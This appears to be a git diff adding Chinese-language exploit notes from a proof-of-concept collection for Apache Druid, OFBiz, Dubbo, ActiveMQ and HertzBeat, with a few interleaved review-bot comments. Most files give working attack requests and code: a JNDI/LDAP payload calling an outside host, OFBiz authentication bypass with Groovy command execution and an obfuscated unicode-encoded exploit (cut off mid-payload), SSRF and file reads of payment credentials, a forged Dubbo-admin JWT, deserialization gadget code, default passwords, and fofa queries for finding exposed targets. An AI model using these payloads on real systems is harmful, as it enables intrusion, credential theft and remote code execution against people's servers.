@@ -0,0 +1,83 @@ +# Apace Druid存在 远程命令执行漏洞(CVE-2023-25194) + +# 一、漏洞简介 +Apache Druid是一个实时分析型数据库,旨在对大型数据集进行快速的查询分析("OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景,同时,Druid也通常被用来助力分析型应用的图形化界面,或者当做需要快速聚合的高并发后端API,Druid最适合应用于面向事件类型的数据。Apace Druid存在 远程命令执行漏洞(CVE-2023-25194) + +# 二、影响版本 ++ 0.19.0 <= Apache Druid <= 25.0.0 + +# 三、资产测绘 +```java +title="Apache Druid" +``` + +![1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289.png](./img/XPRtC17bmvqPfx-1/1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289-439817.png) + +# 四、漏洞复现 +```java +POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 +Host: +Content-Length: 1400 +Accept: application/json, text/plain, */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Content-Type: application/json +Origin: http://vps:8888 +Referer: http://vps:8888/unified-console.html +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: pZaf_2132_ulastactivity=050484OuqAxDqETcOja26QKgFkE4HbrlSk4NbAkGRg9oNLIbkCUN; pZaf_2132_nofavfid=1; pZaf_2132_smile=1D1; pZaf_2132_home_readfeed=1682214968; pZaf_2132_lastviewtime=1%7C1682215445; pZaf_2132_lastcheckfeed=1%7C1682217817; kOJf_2132_saltkey=MGWItu8r; kOJf_2132_lastvisit=1683339017; kOJf_2132_ulastactivity=27e4qsFumyqDRGo03vcLLEHChJmZRharD1jfbUJnU1NIIIrbB8UL; kOJf_2132_nofavfid=1; kOJf_2132_lastcheckfeed=1%7C1683342726; PHPSESSID=3543e022151ed94117e84216 +Connection: close + +{ + "type":"kafka", + "spec":{ + "type":"kafka", + "ioConfig":{ + "type":"kafka", + "consumerProperties":{ + "bootstrap.servers":"127.0.0.1:6666", + "sasl.mechanism":"SCRAM-SHA-256", + "security.protocol":"SASL_SSL", + "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://wuriedscos.dgrh3.cn\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" + }, + "topic":"test", + "useEarliestOffset":true, + "inputFormat":{ + "type":"regex", + "pattern":"([\\s\\S]*)", + 
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965", + "columns":[ + "raw" + ] + } + }, + "dataSchema":{ + "dataSource":"sample", + "timestampSpec":{ + "column":"!!!_no_such_column_!!!", + "missingValue":"1970-01-01T00:00:00Z" + }, + "dimensionsSpec":{ + + }, + "granularitySpec":{ + "rollup":false + } + }, + "tuningConfig":{ + "type":"kafka" + } + }, + "samplerConfig":{ + "numRows":500, + "timeoutMs":15000 + } +} +``` + +![1718119163845-f6728f22-d36c-4d3c-b141-603b89a28b4c.png](./img/XPRtC17bmvqPfx-1/1718119163845-f6728f22-d36c-4d3c-b141-603b89a28b4c-459554.png) + + + +> 更新: 2024-06-17 09:22:47 +> 原文: \ No newline at end of file diff --git a/ApaceOFBizgetJSONuiLabelArray存在服务端请求伪造ssrf漏洞.md b/ApaceOFBizgetJSONuiLabelArray存在服务端请求伪造ssrf漏洞.md new file mode 100644 index 0000000..c385390 --- /dev/null +++ b/ApaceOFBizgetJSONuiLabelArray存在服务端请求伪造ssrf漏洞.md 
@@ -0,0 +1,47 @@ +# Apace OFBiz getJSONuiLabelArray存在服务端请求伪造ssrf漏洞 + +# 一、漏洞简介 +Apache OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。Apace OFBiz getJSONuiLabelArray存在服务端请求伪造ssrf漏洞。 + +# 二、影响版本 ++ Apace OFBiz + +# 三、资产测绘 ++ fofa`app="Apache_OFBiz"` ++ 特征 + +![1704514365135-311b494b-09b2-413f-a8ec-93f13c5b2b53.png](./img/4TixQa4ZMwFFg4Du/1704514365135-311b494b-09b2-413f-a8ec-93f13c5b2b53-414907.png) + +# 四、漏洞复现 +1. 获取dnslog地址 + +```plain +v3f9em.dnslog.cn +``` + +![1704514419059-66d8b314-0740-451a-b678-7e22e50ebc03.png](./img/4TixQa4ZMwFFg4Du/1704514419059-66d8b314-0740-451a-b678-7e22e50ebc03-246109.png) + +2. 测试是否存在漏洞 + +```plain +POST /partymgr/control/getJSONuiLabelArray HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 +Content-Length: 79 +Accept-Encoding: gzip, deflate +Connection: close +Content-Type: application/x-www-form-urlencoded + +requiredLabels={"https://v3f9em.dnslog.cn/api":["2aZ6okJyCI0H8XLAUeiv9Yu3wOK"]} +``` + +![1704514461121-2657a5fc-cf77-4b35-8857-1069d87ccd00.png](./img/4TixQa4ZMwFFg4Du/1704514461121-2657a5fc-cf77-4b35-8857-1069d87ccd00-991338.png) + +![1704514477535-9277697c-782c-4d32-b5d3-c94147c4b724.png](./img/4TixQa4ZMwFFg4Du/1704514477535-9277697c-782c-4d32-b5d3-c94147c4b724-582845.png) + +[apache-OFBiz-getjsonuilabelarray-服务端请求伪造.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222253157-27d1351f-0247-4560-b9a5-3c8db0b44532.yaml) + + + +> 更新: 2024-02-29 23:57:33 +> 原文: \ No newline at end of file diff --git a/Apache-ActiveMQ远程命令执行漏洞.md b/Apache-ActiveMQ远程命令执行漏洞.md new file mode 100644 index 0000000..07deb5e --- /dev/null +++ b/Apache-ActiveMQ远程命令执行漏洞.md 
@@ -0,0 +1,48 @@ +## Apache ActiveMQ远程命令执行漏洞 + +## 影响版本 +``` +5.18.0<=Apache ActiveMQ<5.18.3 +5.17.0<=Apache ActiveMQ<5.17.6 +5.16.0<=Apache ActiveMQ<5.16.7 +5.15.0<=Apache ActiveMQ<5.15.15 +``` +## fofa +``` +app="APACHE-ActiveMQ" && port="61616" +``` +## ActiveMqRCE 有回显 +``` +https://github.com/Hutt0n0/ActiveMqRCE + +``` +## 11.16号新增有回显的命令执行exp +``` + + + + + + + + +``` +## 漏洞回显复现 +![](./assets/20231117150110.png) + + +## 漏洞脚本 +``` +https://github.com/Fw-fW-fw/activemq_Throwable +https://github.com/sincere9/Apache-ActiveMQ-RCE +https://github.com/X1r0z/ActiveMQ-RCE +``` + +## 漏洞分析 +``` +https://paper.seebug.org/3058/ +https://mp.weixin.qq.com/s/4n7vyeXLtim0tXcjnSWDAw +``` diff --git a/Apache-Dubbo-admin-authorized-bypass-(CNVD-2023-96546).md b/Apache-Dubbo-admin-authorized-bypass-(CNVD-2023-96546).md new file mode 100644 index 0000000..3dfa011 --- /dev/null +++ b/Apache-Dubbo-admin-authorized-bypass-(CNVD-2023-96546).md 
@@ -0,0 +1,71 @@ +## Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546) + + +## exp +```java +package org.apache.dubbo.admin.controller; + +import io.jsonwebtoken.Jwts; +import io.jsonwebtoken.SignatureAlgorithm; + +import java.util.Date; +import java.util.HashMap; +import java.util.Map; + +public class jwt { + public static String generateToken(String rootUserName) { + String secret = "86295dd0c4ef69a1036b0b0c15158d77"; + Long timeStamp = 9999999999999L; + Date date = new Date(timeStamp); + final SignatureAlgorithm defaultAlgorithm = SignatureAlgorithm.HS512; + Map claims = new HashMap<>(1); + claims.put("sub", rootUserName); + return Jwts.builder() + .setClaims(claims) + .setExpiration(date) + .setIssuedAt(new Date(System.currentTimeMillis())) + .signWith(defaultAlgorithm, secret) + .compact(); + } + public static void main(String[] args) { + String root = jwt.generateToken("root"); + System.out.println(root); + + + } +} +``` + +## nuclei +``` +id: dubbo-admin_Unauthorized_bypass +info: + name: Template Name + author: + severity: medium + description: dubbo-admin Unauthorized access bypass + reference: + - https:// + tags: apache,dubbo-admin +requests: + - raw: + - |+ + GET /api/dev/consumers HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Authorization: eyJhbGciOiJIUzUxMiJ9.eyJleHAiOjk5OTk5OTk5OTksInN1YiI6InJvb3QiLCJpYXQiOjE2OTkwODM2Mzd9.wKRqJkWxr_nVDcVVF5rniqhnACtqaDnYUUu55g-atkIwRIt1A-SMpKqBN5zrGZl4kFVcrjzMvXsYqfqf0N9Gbg + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 + Referer: http://{{Hostname}}/ + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + matchers: + - type: word + part: header + words: + - 'HTTP/1.1 200 ' +``` + +## 漏洞来源 +- https://mp.weixin.qq.com/s/Wsdx_qi1PeiDwbF_YadoOQ 
diff --git a/Apache-Dubbo-反序列化漏洞(CVE-2023-29234).md b/Apache-Dubbo-反序列化漏洞(CVE-2023-29234).md new file mode 100644 index 0000000..3257a10 --- /dev/null +++ b/Apache-Dubbo-反序列化漏洞(CVE-2023-29234).md 
@@ -0,0 +1,99 @@ +## Apache Dubbo 反序列化漏洞(CVE-2023-29234) + +Apache Dubbo 是一款微服务开发框架,它提供了RPC通信与微服务治理两大关键能力。使应用可通过高性能的 RPC 实现服务的输出和输入功能,可以和 Spring 框架无缝集成。 +Apache Dubbo 某些版本在解码恶意包时存在反序列化漏洞,远程攻击者可利用该漏洞执行任意代码。 + +## 影响版本 +``` +3.1.0<=Apache Dubbo<=3.1.10 +3.2.0<=Apache Dubbo<=3.2.4 +``` + +## 利用方式一:fake server +``` +@Override + protected void encodeResponseData(Channel channel, ObjectOutput out, Object data, String version) throws IOException { + Result result = (Result) data; + // currently, the version value in Response records the version of Request + boolean attach = Version.isSupportResponseAttachment(version); +// Throwable th = result.getException(); + Object th = null; // 利用点: 用于 toString 的 gadget chain + try { + th = getThrowablePayload("open -a calculator"); + } catch (Exception e) { + + } + + if (th == null) { + Object ret = result.getValue(); + if (ret == null) { + out.writeByte(attach ? RESPONSE_NULL_VALUE_WITH_ATTACHMENTS : RESPONSE_NULL_VALUE); + } else { + out.writeByte(attach ? RESPONSE_VALUE_WITH_ATTACHMENTS : RESPONSE_VALUE); + out.writeObject(ret); + } + } else { + out.writeByte(attach ? RESPONSE_WITH_EXCEPTION_WITH_ATTACHMENTS : RESPONSE_WITH_EXCEPTION); +// out.writeThrowable(th); + out.writeObject(th); // 直接序列化对象即可 + } + + if (attach) { + // returns current version of Response to consumer side. + result.getObjectAttachments().put(DUBBO_VERSION_KEY, Version.getProtocolVersion()); + out.writeAttachments(result.getObjectAttachments()); + } + } +``` + +## 利用方式二:客户端打服务端 +``` +public static void main(String[] args) throws Exception { + + ByteArrayOutputStream boos = new ByteArrayOutputStream(); + ByteArrayOutputStream nativeJavaBoos = new ByteArrayOutputStream(); + Serialization serialization = new NativeJavaSerialization(); + NativeJavaObjectOutput out = new NativeJavaObjectOutput(nativeJavaBoos); + + // header. + byte[] header = new byte[HEADER_LENGTH]; + // set magic number. 
+ Bytes.short2bytes(MAGIC, header); + // set request and serialization flag. + header[2] = serialization.getContentTypeId(); + + header[3] = Response.OK; + Bytes.long2bytes(1, header, 4); + + // result + Object exp = getThrowablePayload("open -a calculator"); // Rome toString 利用链 + out.writeByte(RESPONSE_WITH_EXCEPTION); + out.writeObject(exp); + + out.flushBuffer(); + + Bytes.int2bytes(nativeJavaBoos.size(), header, 12); + boos.write(header); + boos.write(nativeJavaBoos.toByteArray()); + + byte[] responseData = boos.toByteArray(); + + Socket socket = new Socket("127.0.0.1", 20880); + OutputStream outputStream = socket.getOutputStream(); + outputStream.write(responseData); + outputStream.flush(); + outputStream.close(); + } + + protected static Object getThrowablePayload(String command) throws Exception { + Object o = Gadgets.createTemplatesImpl(command); + ObjectBean delegate = new ObjectBean(Templates.class, o); + + return delegate; + } +``` +![image](https://github.com/wy876/POC/assets/139549762/707361a3-2f27-415f-a0d0-db935bfbcd2f) + +## 漏洞来源 +- https://xz.aliyun.com/t/13187#toc-3 +- https://github.com/RacerZ-fighting/DubboPOC diff --git a/Apache-HertzBeat-SnakeYaml反序列化漏洞(CVE-2024-42323).md b/Apache-HertzBeat-SnakeYaml反序列化漏洞(CVE-2024-42323).md new file mode 100644 index 0000000..07054ed --- /dev/null +++ b/Apache-HertzBeat-SnakeYaml反序列化漏洞(CVE-2024-42323).md 
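Review bot: in Apache-Dubbo-反序列化漏洞(CVE-2023-29234).md both code blocks lean on symbols the file never introduces. `getThrowablePayload` is called in 利用方式一 but only defined at the end of 利用方式二, and `Gadgets.createTemplatesImpl`, `ObjectBean`, `NativeJavaSerialization`, `HEADER_LENGTH`, `MAGIC` and `Response.OK` come from dependencies that are not named anywhere, so a reader cannot tell which library or Dubbo version the snippets were built against; add the imports or a sentence naming them, tag both fences as ```java, and replace the empty `catch (Exception e) { }` with at least a logged message so a failed payload build is not silent. The 影响版本 block also lists only the vulnerable ranges (3.1.0 to 3.1.10, 3.2.0 to 3.2.4) with no fixed release, so a defender reading this cannot tell what to upgrade to; add the patched versions from the vendor advisory next to the ranges.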
@@ -0,0 +1,23 @@ +# Apache-HertzBeat-SnakeYaml反序列化漏洞(CVE-2024-42323) + +Apache HertzBeat 是开源的实时监控工具。受影响版本中由于使用漏洞版本的 SnakeYAML v1.32解析用户可控的 yaml 文件,经过身份验证的攻击者可通过 /api/monitors/import、/api/alert/defines/import 接口新增监控类型时配置恶意的 yaml 脚本远程执行任意代码。 + +## 漏洞复现 + +访问http://localhost:4200/,admin/hertzbeat登录后台,选择任何监控点击导入监控 + +![image-20241009211426283.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250931543.png) + +修改上传yaml文件中的value值: + +![image-20241009211949488.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250931481.png) + +成功执行代码 + +![image-20241009211904763.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250931374.png) + + + +## 漏洞来源 + +- https://forum.butian.net/article/612 \ No newline at end of file diff --git a/Apache-HertzBeat开源实时监控系统存在默认口令漏洞.md b/Apache-HertzBeat开源实时监控系统存在默认口令漏洞.md new file mode 100644 index 0000000..6d66665 --- /dev/null +++ b/Apache-HertzBeat开源实时监控系统存在默认口令漏洞.md @@ -0,0 +1,18 @@ +# Apache-HertzBeat开源实时监控系统存在默认口令漏洞 +HertzBeat(赫兹跳动) 是一个开源实时监控系统,无需Agent,性能集群,兼容Prometheus,自定义监控和状态页构建能力。HertzBeat 的强大自定义,多类型支持,高性能,易扩展,希望能帮助用户快速构建自有监控系统。HertzBeat(赫兹跳动) 开源实时监控系统存在默认口令漏洞。 + +## fofa + +```javascript +app="HertzBeat-实时监控系统" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731984344118-f35cf51e-396b-4c72-958e-32a2ce31f18e.png) + +## poc +```java +默认账号密码 admin/hertzbeat +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731984356948-93102e68-6ce3-49cd-8bb6-44ceb8143325.png) + diff --git a/Apache-OFBiz-SSRF-&&-任意配置读取.md b/Apache-OFBiz-SSRF-&&-任意配置读取.md new file mode 100644 index 0000000..e2d4059 --- /dev/null +++ b/Apache-OFBiz-SSRF-&&-任意配置读取.md 
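Review bot: Apache-HertzBeat-SnakeYaml反序列化漏洞(CVE-2024-42323).md is missing the 影响版本 section that the other files in this commit carry, so the statement that the affected versions bundle SnakeYAML v1.32 has no HertzBeat version range or fixed release attached to it; add both. The 漏洞复现 steps also do not match the description: the text names the `/api/monitors/import` and `/api/alert/defines/import` endpoints, but the reproduction shows only a UI import with "修改上传yaml文件中的value值" and three screenshots, without saying which yaml key is the one that reaches the parser or which of the two endpoints the UI calls; one sentence tying the screenshots to the endpoint would let readers verify a patched build and write a rule on that request path. The precondition that the attacker is already authenticated (the repro logs in as admin/hertzbeat, the same default credential documented in the next file) is worth stating explicitly, since rotating that password removes the entry point this file depends on.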
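Review bot: in Apache-HertzBeat开源实时监控系统存在默认口令漏洞.md the two fences are tagged `javascript` and `java` although neither block is code (one is a fofa query, the other the sentence "默认账号密码 admin/hertzbeat"); use untagged fences so renderers do not apply bogus syntax highlighting. The description paragraph is a product blurb and the last sentence just restates the title; the useful detail for a reader is that this credential is also the one the SnakeYaml file logs in with, so cross-reference that file and state that the mitigation is to change the default password on first login.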
@@ -0,0 +1,50 @@ +## Apache OFBiz SSRF && 任意配置读取 + + +## 任意文件读取漏洞 poc +以读取 applications/accounting/config/payment.properties 中的几个 key 为例 + +``` +POST /webtools/control/getJSONuiLabelArray/?USERNAME=&PASSWORD=s&requirePasswordChange=Y HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Cache-Control: no-cache +Pragma: no-cache +Host: +Content-type: application/x-www-form-urlencoded +Content-Length: 148 + +requiredLabels={"file:applications/accounting/config/payment.properties":["payment.verisign.user","payment.verisign.pwd","payment.verisign.vendor"]} +``` +![image](https://github.com/wy876/POC/assets/139549762/093b6ca3-2917-4607-93a0-efaf2b3e2ca8) + +## SSRF +``` +POST /webtools/control/getJSONuiLabelArray/?USERNAME=&PASSWORD=s&requirePasswordChange=Y HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Cache-Control: no-cache +Pragma: no-cache +Host: +Content-type: application/x-www-form-urlencoded +Content-Length: 148 + +requiredLabels={"http://127.0.0.1/":["xxxxxx"]} +```` + +这里随便写一个 properties 文件,然后 python -m http.server 8000 起个服务 +![image](https://github.com/wy876/POC/assets/139549762/683a3f21-0405-43f1-9d51-a44752107432) + +![image](https://github.com/wy876/POC/assets/139549762/7f5e826e-9564-4343-bf1e-d0d530ab7a3a) + +![image](https://github.com/wy876/POC/assets/139549762/beb30398-fa1b-4028-98f9-b3e8ccb4d90e) + + + + +## 漏洞来源 +- https://xz.aliyun.com/t/13211 
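Review bot: the SSRF request in Apache-OFBiz-SSRF-&&-任意配置读取.md carries `Content-Length: 148`, which was copied from the file-read request above it; the body shown (`requiredLabels={"http://127.0.0.1/":["xxxxxx"]}`) is 47 bytes, so the request as written will stall waiting for data that never arrives. Fix the length or drop the header and let the client compute it. The follow-up text says to serve a properties file with `python -m http.server 8000`, but the request targets `http://127.0.0.1/` on port 80, so one of the two is wrong. The SSRF block also closes with four backticks while every other fence in the commit uses three; make them consistent. Neither request explains that `USERNAME=&PASSWORD=s&requirePasswordChange=Y` is the authentication bypass documented in the CVE-2023-51467 file, and the file has no 影响版本 or fixed-release line; add a cross-reference and the patched version from the vendor advisory so readers know which upgrade closes both the file read and the SSRF.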
diff --git a/Apache-OFBiz-身份验证绕过漏洞-(CVE-2023-51467).md b/Apache-OFBiz-身份验证绕过漏洞-(CVE-2023-51467).md new file mode 100644 index 0000000..bd8c02c --- /dev/null +++ b/Apache-OFBiz-身份验证绕过漏洞-(CVE-2023-51467).md 
@@ -0,0 +1,86 @@ +## Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467) + + Apache OFBiz 在后台提供了执行groovy 代码的功能,但是由于存在认证绕过问题,攻击者可构造恶意请求绕过身份认证,利用后台相关接口功能执行groovy代码,执行任意命令,控制服务器。 + + +## fofa +``` +app="Apache_OFBiz" +``` + +## poc +``` +POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1 +Host: 127.0.0.1:8443 +Cookie: OFBiz.Visitor=10100 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Referer: https://127.0.0.1:8443/accounting/control/main +Content-Type: application/x-www-form-urlencoded +Content-Length: 166 +Origin: https://127.0.0.1:8443 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers +Connection: close + +groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+new+GroovyShell%28%29%3B%0D%0Ashell.evaluate%28%27%22curl+CVE-2023-51467.xxxxxx.ceye.io%22.execute%28%29%27%29 +``` + + +![c930c2bb7200a1868dad8c9d1e58cf38](https://github.com/wy876/POC/assets/139549762/b516c218-f05a-45f9-974e-be96acd0a93c) + +## exp +``` +POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1 +Host: 127.0.0.1:28080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Cmd: id +Content-Length: 41 + 
+groovyProgram=\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u0078\u002e\u0073\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0063\u0072\u0069\u0070\u0074\u0045\u006e\u0067\u0069\u006e\u0065\u004d\u0061\u006e\u0061\u0067\u0065\u0072\u0028\u0029\u002e\u0067\u0065\u0074\u0045\u006e\u0067\u0069\u006e\u0065\u0042\u0079\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0073\u0022\u0029\u002e\u0065\u0076\u0061\u006c\u0028\u0022\u0074\u0072\u0079\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u006c\u006f\u0061\u0064\u0028\u005c\u0022\u006e\u0061\u0073\u0068\u006f\u0072\u006e\u003a\u006d\u006f\u007a\u0069\u006c\u006c\u0061\u005f\u0063\u006f\u006d\u0070\u0061\u0074\u002e\u006a\u0073\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0065\u0029\u0020\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u006d\u0069\u0073\u0063\u002e\u0055\u006e\u0073\u0061\u0066\u0065\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0074\u0068\u0065\u0055\u006e\u007
3\u0061\u0066\u0065\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0020\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0067\u0065\u0074\u0028\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u006c\u0061\u0073\u0073\u0043\u0061\u0063\u0068\u0065\u0028\u0063\u006c\u0061\u007a\u007a\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u007a\u007a\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\
u0073\u0073\u0028\u0063\u006c\u0061\u007a\u007a\u002c\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0052\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u0041\u0073\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u005c\u0022\u0043\u006c\u0061\u0073\u0073\u002e\u0063\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0072\u0065\u0061\u0064\u0041\u006c\u006c\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u002c\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0063\u006c\u0061\u007a\u007a\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0063\u006c\u0061\u007a\u007a\u002c\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u006f\u0062\u006a\u0065\u0063\u0074\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u0072\u0065\u0066\u006c\u0065